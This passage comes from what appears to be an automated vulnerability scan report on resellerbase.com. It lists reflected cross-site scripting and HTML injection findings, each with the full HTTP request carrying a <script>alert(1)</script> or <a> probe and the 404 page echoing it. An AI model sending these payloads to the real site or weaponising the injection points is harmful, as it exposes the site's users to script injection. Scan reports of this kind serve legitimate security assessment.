GET /detail/1835fcb<script>alert(1)</script>9ccdc8178ba/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/18/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/1835fcb<script>alert(1)</script>9ccdc8178ba/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1542. http://www.resellerbase.com/detail/18/themes/kosmos/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/18/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e15c9<script>alert(1)</script>75c7daef5eb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/18/themese15c9<script>alert(1)</script>75c7daef5eb/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/18/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/themese15c9<script>alert(1)</script>75c7daef5eb/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1543. http://www.resellerbase.com/detail/18/themes/kosmos/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/18/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 1db5e<script>alert(1)</script>eab3fc2815f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/18/themes/kosmos1db5e<script>alert(1)</script>eab3fc2815f/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/18/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/themes/kosmos1db5e<script>alert(1)</script>eab3fc2815f/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1544. http://www.resellerbase.com/detail/18/themes/kosmos/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/18/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 4e14c<script>alert(1)</script>1b633adc14d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/18/themes/kosmos/search.php4e14c<script>alert(1)</script>1b633adc14d?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/18/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/themes/kosmos/search.php4e14c<script>alert(1)</script>1b633adc14d?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1545. http://www.resellerbase.com/detail/18/themes/kosmos/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/18/themes/kosmos/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 4e798<a>ab03dcb2492 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/18/themes/kosmos/search.php?keyword=search...&Submit3=Search4e798<a>ab03dcb2492&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/18/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/themes/kosmos/search.php?keyword=search...&Submit3=Search4e798<a>ab03dcb2492&opt=2 was not found on this server.</p>
...[SNIP]...

2.1546. http://www.resellerbase.com/detail/18/themes/kosmos/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/18/themes/kosmos/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload f7c0c<a>62f6d055c3a was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/18/themes/kosmos/search.php?keyword=search...f7c0c<a>62f6d055c3a&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/18/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/themes/kosmos/search.php?keyword=search...f7c0c<a>62f6d055c3a&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1547. http://www.resellerbase.com/detail/18/themes/kosmos/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/18/themes/kosmos/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 7a6cc<script>alert(1)</script>42343590804 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/18/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&7a6cc<script>alert(1)</script>42343590804=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/18/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&7a6cc<script>alert(1)</script>42343590804=1 was not found on this server.</p>
...[SNIP]...

2.1548. http://www.resellerbase.com/detail/18/themes/kosmos/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/18/themes/kosmos/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 5fe62<a>9cf0992b1ff was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/18/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=25fe62<a>9cf0992b1ff HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/18/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=25fe62<a>9cf0992b1ff was not found on this server.</p>
...[SNIP]...

2.1549. http://www.resellerbase.com/detail/18/themes/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/18/themes/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4ee26<script>alert(1)</script>bc3dff118e4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail4ee26<script>alert(1)</script>bc3dff118e4/18/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/18/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail4ee26<script>alert(1)</script>bc3dff118e4/18/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1550. http://www.resellerbase.com/detail/18/themes/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/18/themes/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 72e03<script>alert(1)</script>fb2ef88b63b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/1872e03<script>alert(1)</script>fb2ef88b63b/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/18/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/1872e03<script>alert(1)</script>fb2ef88b63b/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1551. http://www.resellerbase.com/detail/18/themes/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/18/themes/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6be00<script>alert(1)</script>37ffdd5f9a2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/18/themes6be00<script>alert(1)</script>37ffdd5f9a2/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/18/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/themes6be00<script>alert(1)</script>37ffdd5f9a2/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1552. http://www.resellerbase.com/detail/18/themes/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/18/themes/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 9bb13<script>alert(1)</script>22193e02fa9 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/18/themes/search.php9bb13<script>alert(1)</script>22193e02fa9?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/18/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/themes/search.php9bb13<script>alert(1)</script>22193e02fa9?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1553. http://www.resellerbase.com/detail/18/themes/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/18/themes/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 110db<a>d713fb801f was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/18/themes/search.php?keyword=search...&Submit3=Search110db<a>d713fb801f&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/18/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/themes/search.php?keyword=search...&Submit3=Search110db<a>d713fb801f&opt=2 was not found on this server.</p>
...[SNIP]...

2.1554. http://www.resellerbase.com/detail/18/themes/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/18/themes/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload bf89f<a>01c3d9fdbc9 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/18/themes/search.php?keyword=search...bf89f<a>01c3d9fdbc9&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/18/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/themes/search.php?keyword=search...bf89f<a>01c3d9fdbc9&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1555. http://www.resellerbase.com/detail/18/themes/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/18/themes/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 87094<script>alert(1)</script>bb99055ba5b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/18/themes/search.php?keyword=search...&Submit3=Search&opt=2&87094<script>alert(1)</script>bb99055ba5b=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/18/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/themes/search.php?keyword=search...&Submit3=Search&opt=2&87094<script>alert(1)</script>bb99055ba5b=1 was not found on this server.</p>
...[SNIP]...

2.1556. http://www.resellerbase.com/detail/18/themes/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/18/themes/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 9c6dc<a>943fe4344e8 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/18/themes/search.php?keyword=search...&Submit3=Search&opt=29c6dc<a>943fe4344e8 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/18/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/themes/search.php?keyword=search...&Submit3=Search&opt=29c6dc<a>943fe4344e8 was not found on this server.</p>
...[SNIP]...

2.1557. http://www.resellerbase.com/detail/18/worlddatingpartners-com.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/18/worlddatingpartners-com.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 73515<script>alert(1)</script>ad7a390f648 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail73515<script>alert(1)</script>ad7a390f648/18/worlddatingpartners-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:25:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail73515<script>alert(1)</script>ad7a390f648/18/worlddatingpartners-com.html was not found on this server.</p>
...[SNIP]...

2.1558. http://www.resellerbase.com/detail/18/worlddatingpartners-com.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/18/worlddatingpartners-com.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5a3d7<a>a3083c22d9b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/185a3d7<a>a3083c22d9b/worlddatingpartners-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:26:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/185a3d7<a>a3083c22d9b/worlddatingpartners-com.html was not found on this server.</p>
...[SNIP]...

2.1559. http://www.resellerbase.com/detail/18/worlddatingpartners-com.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/18/worlddatingpartners-com.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ed2e8<script>alert(1)</script>fe69a678196 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/18/ed2e8<script>alert(1)</script>fe69a678196 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:27:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
